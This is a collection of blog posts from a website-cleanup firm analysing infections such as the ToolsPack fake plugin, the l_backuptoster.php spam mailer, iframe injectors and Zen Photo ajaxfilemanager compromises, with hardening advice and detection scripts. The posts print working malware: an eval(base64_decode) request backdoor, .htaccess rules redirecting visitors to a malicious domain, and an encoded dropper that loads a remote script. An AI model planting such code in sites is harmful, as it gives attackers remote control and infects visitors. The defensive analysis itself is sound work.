SQL injections on websites carrying backdoor scripts
We’ve seen this for a while now, but recently it seems to be a growing trend.
Many of the websites we’ve been cleaning have the backdoor scripts injected into the SQL database so that when the webpage is accessed, the backdoor is available, but invisible to the visitor.
To a hacker who knows what page or which website is carrying their code, it’s easy for them to send a string of code and on their screen the backdoor shell script appears.
When we have the access logs available to us, we have analyzed them and it does not appear to be a regular SQL injection (SQLi), but it does appear that the hackers find a point of entry to the website, then search for the file that contains the database information. They upload a shell that provides them with something like phpmyadmin, then they add their infectious code to selected fields in the database.
We know that many people believe that moving their wp-config.php file outside of the public_html folder keeps their database login information safe. This is not true. When a hacker infects a website, they typically have full access to the hosting account. This includes the areas outside of public_html. We’ve seen this thousands of times.
At times the code has been an infectious iframe or other JavaScript string; however, finding full backdoor shells buried in the SQL database is even more alarming. The hackers have created various ways of hiding this so that when a legitimate user visits the website they don’t see any suspicious code. When a hacker sends their code to the specific webpage, it opens their backdoor shell. This hides their code from many of the online scanners. We still feel these online scanners are helpful, but the hackers are finding various methods to hide their activities.
This makes repeat infections extremely easy for the hackers. As a website owner you could be searching all the code on your site and find nothing. To find this malicious code, you’ll have to export your database and then scan it for any script tags and for any php tags. If you find any, you’ll have to analyze the string to determine if it’s malicious or not.
One key we’ve found is that their backdoor shells need a field in the database that’s large enough to contain their lengthy code – at least for the backdoor shell scripts. Smaller javascript or iframe infections could be anywhere in the database. You’ll have to be familiar enough with the database layout for your website to know where to look.
If you’ve been subjected to repeat infections, you might want to look in your database. Even if you haven’t been subjected to repeat website infection, you might still want to look in your database to see what might be lurking.
If you need help analyzing your database, please send an email to: traef@wewatchyourwebsite.com.
If you have any more insight to this infection, or have additional questions, please leave a comment.
Thank you.
Pinterest being used by cybercriminals
Pinterest interesting to cybercriminals
It didn’t take long for hackers to take advantage of the social networking site: pinterest.com.
If you’re not familiar with Pinterest, it’s a site where you can create a “board” and you then “pin” video or graphic image files of anything that interests you.
Friends, family, acquaintances, can re-pin your pinned interests and so on…
Recently, cybercriminals have been posting images of Starbucks gift cards and free Coach wallets and purses (handbags, as my wife prefers).
The potential victim will have to visit a particular site to claim their “prize”.
The scam begins when you visit that site: you’re redirected to a website that first requires you to re-pin the image, so they can spread their “generosity” further, and then asks you to click on a link to a survey site – which is a scam.
Cybercriminals are very adept at scams like these. They know that by asking you to re-pin their pin, people you know will help spread their scam.
Some of the redirects are to CPA (cost-per-action) sites where the cybercriminals are paid to drive traffic to these sites. Other sites the unsuspecting victim is redirected to ask them to install toolbars, backgrounds and other seemingly “harmless” utilities. Cybercriminals also get paid for these installations as pay-per-installs.
Some redirects we followed actually asked for personal information. We believe this could eventually be used to steal identities which are then sold to other cybercriminals.
People always ask us why hackers hack. This is one method they have of making money. While this method may not directly infect or attempt to infect your computer, it feeds the cybercriminals with more income.
If you’ve followed any of these, please share your experience below. If you know someone who is using Pinterest.com, please let them know about this scam.
Thank you.
“you need to pay for this crypt” infection
We’ve been seeing a lot of this lately, infected websites that have the wording,
you need to pay for this crypt
over and over a few times across the top of the webpages.
This is usually accompanied by some script tags that try to infect the visitor with the Blackhole Kit. (The Blackhole Kit is an exploit kit used by hackers to try to infect the visitor’s browser with a variety of viruses, trojans and other malware.)
On WordPress websites we’ve seen this in the index.php files all over the website. It’s an indication that your website has been infected and needs to be cleaned and hardened.
You can begin by removing the malscript immediately preceding this text. Look in wp-content/index.php, which is normally about 30 bytes; with anything malicious in it, the file will be much larger.
Then, make certain that your WordPress is updated and all plugins too.
We’ve also been seeing many WordPress sites infected due to hackers logging into their wp-admin.
Why?
Because there are still many people who believe that having admin as a user and admin as a password is acceptable. Too many people believe that, “Hackers only want the bigger, more heavily visited websites. They won’t bother with mine.”
People. Hackers want all websites. The amount of “low-hanging fruit” needs to be drastically reduced – or better yet, eliminated.
Change your passwords immediately. Make them strong. Make them at least 10 characters and use upper case, lower case, numbers and some punctuation. Take some phrase and convert to a combination of the above.
Take for instance the movie Oceans 11. That can be converted into:
0c3@n$_elEv3N_+h3_MoV1E
Yes, it’s more difficult to remember. But what’s worse? Remembering your password, or having your website constantly infected?
If you need help cleaning up from an infection, please email me at traef@wewatchyourwebsite.com.
Thank you.
Proper use and configuration of timthumb.php
With many themes using the timthumb.php and thumb.php files, we thought we should update our readers with the latest on timthumb.php.
First, make certain you have the latest: http://timthumb.googlecode.com/svn/trunk/timthumb.php
As of this post, the current version is 2.8.9.
Open that file and inside you’ll see this line, which lets you verify you have the correct version:
define ('VERSION', '2.8.9');
Scroll down a few lines and you’ll see:
if(! defined('ALLOW_EXTERNAL') ) define ('ALLOW_EXTERNAL', TRUE); // Allow image fetching from external websites. Will check against ALLOWED_SITES if ALLOW_ALL_EXTERNAL_SITES is false
This means that if the ALLOW_EXTERNAL parameter is set to TRUE, like it is here, and the parameter ALLOW_ALL_EXTERNAL_SITES is false, then timthumb.php will check the included link to see if it’s in the list of ALLOWED_SITES.
If you look at the next line down in this file you’ll see:
if(! defined('ALLOW_ALL_EXTERNAL_SITES') ) define ('ALLOW_ALL_EXTERNAL_SITES', false); // Less secure
With these 2 parameters set the way they are, timthumb.php will only show files from the list of ALLOWED_SITES. Next we need to examine the sites listed in ALLOWED_SITES.
Scroll down a few more lines and you’ll see:
// If ALLOW_EXTERNAL is true and ALLOW_ALL_EXTERNAL_SITES is false, then external images will only be fetched from these domains and their subdomains.
if(! isset($ALLOWED_SITES)){
$ALLOWED_SITES = array (
'flickr.com',
'staticflickr.com',
'picasa.com',
'img.youtube.com',
'upload.wikimedia.org',
'photobucket.com',
'imgur.com',
'imageshack.us',
'tinypic.com',
'yourdomainhere',
);
}
Now in the line where we have 'yourdomainhere', you would replace that with your website domain. For us, it would be 'wewatchyourwebsite.com'. A few things to note here: if you don’t ever expect to load images from the other sites, then delete them as well while you’re in here.
What we’ve done is to allow timthumb.php to show files that are stored on your website and at the locations listed above. Any other domain will not be accepted and will not show. If you don’t do this, then hackers could include files from their websites and infect your website with their malicious code.
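To make the “these domains and their subdomains” rule concrete, here is an added example (our illustration, not timthumb’s own code) of how the three settings above decide whether a src= URL is served, with the check anchored on a dot boundary so a look-alike hostname does not slip through. The 'example-yourdomain.com' entry stands in for 'yourdomainhere'.

```python
from urllib.parse import urlparse

# The post's list, with 'yourdomainhere' swapped for a constructed placeholder domain.
ALLOWED_SITES = ["flickr.com", "staticflickr.com", "img.youtube.com", "example-yourdomain.com"]

def host_allowed(host, allowed_sites):
    """True only when host IS an allowed domain or ends with '.' + an allowed domain.
    Anchoring on the dot boundary is what keeps 'flickr.com.evil.example' out."""
    host = host.lower().rstrip(".")
    for site in allowed_sites:
        site = site.lower()
        if host == site or host.endswith("." + site):
            return True
    return False

def naive_host_allowed(host, allowed_sites):
    """The weak version, for contrast: a plain substring test, which any hostname
    that merely contains an allowed name satisfies."""
    return any(site.lower() in host.lower() for site in allowed_sites)

def external_url_allowed(src, allow_external=True, allow_all_external_sites=False,
                         allowed_sites=ALLOWED_SITES):
    """Apply the three settings from the post to a src= value. Assumption: a plain
    relative path (no scheme, no host) is a file on your own site and is always served;
    a scheme-relative '//host/...' URL is treated as external, not local."""
    parsed = urlparse(src)
    if not parsed.scheme and not parsed.netloc:
        return True
    if not allow_external:
        return False
    if allow_all_external_sites:
        return True
    return host_allowed(parsed.hostname or "", allowed_sites)
```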
This version of timthumb.php does use a non-web folder for cache, so it is more secure, but configuring it this way adds another layer of protection to your site, and we do believe in defense in layers.
If you have questions about this information or you’re having trouble configuring it properly for your site, please post a comment and we’ll help you.
Thank you for reading.
What is the ToolsPack plugin?
Over the past 2 weeks we’ve seen many infected WordPress websites. A large portion of these infected WordPress websites had the ToolsPack plugin installed.
This plugin only has one file: /wp-content/plugins/ToolsPack/ToolsPack.php
Inside that file looks like this:
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
Part of our process in the cleaning of an infected website is determining how the website was infected so we can create a security plan to prevent the website from being infected again.
Many of these infected WordPress websites were “hacked” by stolen login credentials – yes, the WordPress username and password.
How did we find this?
Our process includes log file analysis. We started seeing traffic to the ToolsPack.php file around the same time the files were infected. Closer examination of that file revealed the code listed above.
Some Google searches showed that while the plugin appeared to be marketed as legitimate, it was not.
Further analysis of the datetime stamp on the ToolsPack folder and the log files did not show any correlation. In talking with the website owners we had them run virus scans on their computers, and every one of them with the ToolsPack plugin had a virus or trojan. This included Apple’s Macs.
Yes, the hackers are infecting computers, both PCs and Macs, with password-stealing trojans. These password-stealing trojans are stealing all passwords.
We have worked on many hosting accounts that had FTP accounts added to them. The hackers stole the hosting account username and password, logged in and created their own FTP accounts – with strong passwords of course.
Website security is a blended partnership between WeWatchYourWebsite and you. We can watch and update and protect your website, but if the hackers are logging in as you, we cannot prevent that.
Strong passwords, renaming the admin account and all the security related plugins would not prevent this type of attack. You may be alerted to the new plugin being installed, but by then, your account has already been compromised.
We suggest you run a full virus scan on your computer, yes even on your Mac, at least once a week. Be certain that the signatures are updated every day as well.
If you need assistance in recovering from this infection, please contact me directly at: traef@wewatchyourwebsite.com or by phone at: (847)728-0214.
Thank you.
l_backuptoster.php still showing
Over the past few weeks we’ve cleaned a number of websites that were infected with l_backuptoster.php, and while it’s been around a while, we thought we would share our experience. This infection isn’t so much about website security as it is about computer security, but it does eventually affect your website security as well – which is why we’re involved.
For those of you unfamiliar with this little gem, it’s used by hackers to send SPAM. It is uploaded to the website via FTP – which means that the FTP password has been compromised, or worse, the hosting account password has been compromised.
In the most recent instances of websites infected with the l_backuptoster.php file, a new FTP account was created on the hosting account and that was used to upload the files. The file is uploaded together with 2 other files, body1.txt and body.txt; they are used, then deleted until the next time the hacker wants to send SPAM.
Here is what you might see in your FTP logs:
Tue Dec 20 06:32:41 2011 0 xx.xx.xx.xxx 320 /home/path/public_html/body1.txt b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 06:32:42 2011 0 xx.xx.xx.xxx 292 /home/path/public_html/body.txt b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 06:32:42 2011 0 xx.xx.xx.xxx 8160 /home/path/public_html/l_backuptoster.php b _ i r candy@yourdomain ftp 1 * c
The xx.xx.xx.xxx would actually be the address this traffic is originating from. The number after it is the file size, followed by the path and the FTP account used.
You see that first the body1.txt file, with a size of 320, was uploaded to the folder shown, followed by body.txt with a size of 292 and finally the l_backuptoster.php file with a size of 8160.
If you’ve been infected with this, and you have your Raw Access Logs activated, you will probably also see entries like these in your access logs:
xx.xx.xx.xxx - - [12/Jan/2012:12:34:58 -0700] "GET /l_backuptoster.php?id=4550&ipAddr=xx.xx.xx.xxx&serv_name=www.yourdomain HTTP/1.1" 200 205 "-" "-"
xx.xx.xx.xxx - - [12/Jan/2012:12:34:58 -0700] "GET /l_backuptoster.php?id=4554&ipAddr=xx.xx.xx.xxx&serv_name=www.yourdomain HTTP/1.1" 200 205 "-" "-"
Again, the xx.xx.xx.xxx would actually show the originating IP address. In our work, we track down this IP address and report it to the proper people as this is an indication that the originating IP address is being used in a suspicious manner.
In the above log file entries the ipAddr parameter matches the first IP address, and the serv_name parameter would be your domain, i.e. the infected website’s URL.
You will probably see hundreds of these lines if your website is being used with the l_backuptoster.php file.
What we found in each case of a website infected with l_backuptoster.php was that the FTP account used to upload these files was not created by the hosting account owner. The only way this could have been achieved was if the hosting account password had been compromised.
If this is true, then the hackers are no longer just stealing the FTP login credentials; their keyboard loggers are also recording all logins, and since the hackers are very interested in infecting websites, why not create their own FTP account?
As stated earlier, after the activity in the access logs, we found that the 3 files uploaded were deleted so there was no trace. The hackers would simply upload the files again at a later time, use them and delete them.
Without constant watching of the log files, we would not have seen this.
If you have been a victim of the l_backuptoster.php website infection, here’s what you should do:
- Change your hosting account password
- Check your hosting account for unused or unauthorized FTP accounts and delete any that you aren’t familiar with
- Create new passwords for remaining FTP accounts
- Perform a full system virus scan with either Avast! or AVG anti-virus and use Malwarebytes as a secondary scanner. If you’re using a Mac try BitDefender
- Check your log files on regular basis. Download them to your computer and search for ‘l_backuptoster.php’
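For the last step, searching the downloaded logs is easier with a small script. This is an added example written for this post (not a WeWatchYourWebsite tool): it parses access-log lines in the layout shown above, pulls out the id, ipAddr and serv_name parameters of every hit on l_backuptoster.php, and separately parses xferlog-style FTP entries to list inbound .php uploads and the FTP account that made them. All sample lines, addresses and account names are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qs

MAILER = "l_backuptoster.php"

# Apache combined-format request line, the layout of the raw access log excerpt above.
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def parse_access_line(line):
    """One access-log line -> dict with request path and query parameters, or None."""
    m = ACCESS_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlparse(rec["target"])
    rec["path"] = url.path
    rec["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    return rec

def find_mailer_hits(lines):
    """Requests that reached the mailer script, plus the numbers worth reporting."""
    hits = [r for r in map(parse_access_line, lines)
            if r and r["path"].endswith("/" + MAILER)]
    summary = {
        "total": len(hits),
        "by_source_ip": Counter(r["ip"] for r in hits),
        "served_ok": sum(1 for r in hits if r["status"] == "200"),
        "ids": sorted({r["query"]["id"] for r in hits if "id" in r["query"]}),
        # the post notes that ipAddr= echoes the caller's own address; confirm it
        "ipaddr_matches_source": all(r["query"].get("ipAddr") == r["ip"] for r in hits),
    }
    return hits, summary

def parse_xferlog(line):
    """One xferlog entry (the FTP log format quoted above): 18 whitespace-separated fields."""
    f = line.split()
    if len(f) < 18:
        return None
    return {"when": " ".join(f[0:5]), "host": f[6], "size": int(f[7]),
            "path": f[8], "direction": f[11], "user": f[13]}

def php_uploads(lines):
    """Inbound (direction 'i') FTP transfers of .php files, i.e. the mailer being planted."""
    return [r for r in map(parse_xferlog, lines)
            if r and r["direction"] == "i" and r["path"].lower().endswith(".php")]

# Constructed sample data; 203.0.113.x and 198.51.100.x are documentation addresses.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [12/Jan/2012:12:34:58 -0700] "GET /l_backuptoster.php?id=4550&ipAddr=203.0.113.5&serv_name=www.example.com HTTP/1.1" 200 205 "-" "-"',
    '203.0.113.5 - - [12/Jan/2012:12:34:58 -0700] "GET /l_backuptoster.php?id=4554&ipAddr=203.0.113.5&serv_name=www.example.com HTTP/1.1" 200 205 "-" "-"',
    '198.51.100.7 - - [12/Jan/2012:12:35:01 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Jan/2012:12:36:10 -0700] "GET /l_backuptoster.php?id=4555&ipAddr=203.0.113.5&serv_name=www.example.com HTTP/1.1" 404 289 "-" "-"',
]
SAMPLE_XFERLOG = [
    "Tue Dec 20 06:32:41 2011 0 203.0.113.5 320 /home/acct/public_html/body1.txt b _ i r candy@example.com ftp 1 * c",
    "Tue Dec 20 06:32:42 2011 0 203.0.113.5 8160 /home/acct/public_html/l_backuptoster.php b _ i r candy@example.com ftp 1 * c",
    "Tue Dec 20 09:10:00 2011 0 198.51.100.7 8160 /home/acct/public_html/l_backuptoster.php b _ o r owner@example.com ftp 1 * c",
]
```

A 404 in the summary is still a hit worth keeping: it means the mailer was already deleted when the sender came back, which is exactly the upload-use-delete cycle described above.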
One point to remember: do not ever have your browser save your hosting account password or any other passwords. We have copies of the viruses hackers use to steal passwords and they work extremely well on browser-saved passwords!
If you’ve been infected by this and have more to add, please leave a comment. If you need help in cleaning this up and getting everything “locked down”, please email me at traef@wewatchyourwebsite.com or call at (847)728-0214.
Thank you.
If you found this useful, Tweet about us, like us on Facebook or follow us on Google+.
Attack of the BrowserDetect
This infection has been around for awhile, but it’s been more popular recently.
We’ve been seeing it after the closing html tag in index.html files:
Here’s the code:
(opening script tag) var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent)...');}else {}(closing script tag)
There have been other domains in place of allegianstaffing.com too, but the bottom line is that the above script performs a series of browser checks then creates an iframe.
We have seen this infection in Zen Cart, osCommerce, WordPress and Prestashop websites, but I’m certain that it’s simply the infection in use at the moment.
If you’ve experienced this infection and need assistance with it, please call us at (847)728-0214 or email me at traef@wewatchyourwebsite.com
If you have any comments to add to this, please leave a comment below.
Thank you.
gogele analytics infection
We’re seeing some websites infected with code that starts with:
gogele analytics start
It then continues with:
(opening script tag)try{document.asd.removeChild({})}catch(q){ss="";s=String;}ddd=new Date();…eval(ss);(closing script tag)
and ends with:
gogele analytics end
We’ve been seeing this in index.html files, usually immediately following the opening body tag.
So far, no other common factors in the sites we’ve cleaned this from.
If you have any further information you’d like to share, please post a comment. If we find more information we’ll be sharing it here.
If you know of someone who could benefit from this information, please share it, Tweet it, post it on your Facebook or LinkedIn pages.
If you need help cleaning this, you can call us at (847)728-0214 or email directly at: traef@wewatchyourwebsite.com
Thank you.
New information on the Zen Photo exploit
While cleaning more websites with Zen Photo installed, we’re finding some new infections.
We’ve been seeing files added called thumbsdata.php. They usually have a string of code like this:
$vf=substr(1,1);foreach(array(10,100,111,99,117,109…{ $l = $_GET["l"]; } @header("Location: $l"); exit; }
This is accompanied by an .htaccess file in the same folder with lines similar to this:
ErrorDocument 400 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 401 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 403 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 404 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 500 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
RewriteEngine On
RewriteRule !thumbsdata.php http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI} [R=301,L]
We’ve seen other domains used as well, but this is just an example.
In the log files we’re seeing strings sent to the c.php file in the root of the Zen Photo installation. This file works with captcha, but apparently doesn’t sanitize the data.
Again, this is in older versions of Zen Photo.
Please update your Zen Photo websites immediately.
Post a comment here if you have more information.
If you need assistance in cleaning this up, please call me at (847)728-0214, Skype: wewatchyourwebsite or email me at: traef@wewatchyourwebsite.com
Thank you.
Zen Photo exploited to infect websites
Over the past week we’ve been seeing many photographers’ websites infected through an exploit in Zen Photo. Actually it’s not Zen Photo itself, but the ajaxfilemanager.php file used in the tiny_mce plugin.
Check your websites for the file ajaxfilemanager.php and rename it or delete it.
In Zen Photo based websites the above file can be found in:
zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager
The file is accessible from a browser, which allows anyone to upload files to your website. Quite often we see files on websites with a .jpg or .png extension, which are normally graphic files, but the files we’re concerned with are actually PHP files. The hackers have many ways of renaming these to .php extensions; then they run them and infect the website.
If your website is hosted on a Linux server, you can use a .htaccess file to protect this file with something like:
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /ajaxfilemanager/.*$ [NC]
RewriteCond %{REQUEST_FILENAME} ^.+\.php$
RewriteRule .* - [F,NS,L]
This will prevent remote access to all .php files in the ajaxfilemanager folder.
Depending on what version of Zen Photo, we have seen some config.php files with a line:
define('CONFIG_QUERY_STRING_ENABLE', true);
This appears to allow you to send a string that tells ajaxfilemanager which configuration file to use. It should be set to false.
You can either rename the ajaxfilemanager folder, delete it, use an .htaccess file or make certain your plugins are updated, but you have to do something to protect your website.
The most common file we’ve seen in websites infected through this method is:
/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/class.images.php
And it usually has this code:
(opening php tag followed by a long string of blank spaces)$vf=substr(1,1);foreach(array(10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,39,59,10,10,13,9,92,39,0,112,49,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,102,97,99,101,116,111,102,97,99,101,46,100,101,47,101,120,116,47,62,60,47,115,99,114,105,112,116,62,116,114,117,101,99,115,115) as $vj[0])…unset($vf);unset($vj);(closing php tag)
It is our understanding that the file name is very similar to legitimate files in the same folder.
We’ve been seeing many other backdoors uploaded with this same exploit so you really should have it examined carefully.
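To see what a chr()-array dropper like the one above actually assembles, here is an added decoder (ours, written for this post; not Zen Photo’s code and not the malware’s own) fed the exact list of codes quoted from class.images.php. It also pulls the script tags, URLs and DOM ids out of the decoded text, which is what you need to block and report the domain the injected script loads from.

```python
import re

# Byte values copied from the class.images.php snippet quoted above; the original
# loops over them with foreach(array(...) as $vj[0]) and appends chr() of each.
PAGE_CODES = [10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,
    66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,
    100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,
    69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,
    46,105,110,110,101,114,72,84,77,76,61,39,39,59,10,10,13,9,92,39,0,112,49,60,115,99,114,
    105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,102,97,99,101,116,111,102,97,99,
    101,46,100,101,47,101,120,116,47,62,60,47,115,99,114,105,112,116,62,116,114,117,101,99,
    115,115]

def decode_codes(codes):
    """Turn the list of byte values into the text the dropper builds at run time."""
    return "".join(chr(c) for c in codes)

def codes_from_source(php_source):
    """Pull the integer list out of a foreach(array(...)) as ... construct so the
    same decoder can be pointed at the next variant of the file."""
    m = re.search(r"foreach\s*\(\s*array\s*\(([\d,\s]+)\)", php_source)
    if not m:
        return []
    return [int(x) for x in m.group(1).split(",") if x.strip()]

def triage(decoded):
    """What an analyst wants from the decoded blob: injected script tags, the URLs
    they load, and the DOM ids the script touches (here a hidden 'PhpOutput' element)."""
    return {
        "script_tags": len(re.findall(r"<script\b", decoded, re.I)),
        "urls": re.findall(r"https?://[^\s'\"<>]+", decoded),
        "dom_ids": re.findall(r"getElementById\('([^']+)'\)", decoded),
    }

if __name__ == "__main__":
    text = decode_codes(PAGE_CODES)
    print(repr(text))
    print(triage(text))
```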
Please leave a comment if you found this interesting, if you have more questions about this or have additional information regarding this infection.
As always, if you need help cleaning this up, call us at (847)728-0214 or email me at traef@wewatchyourwebsite.com
Thank you.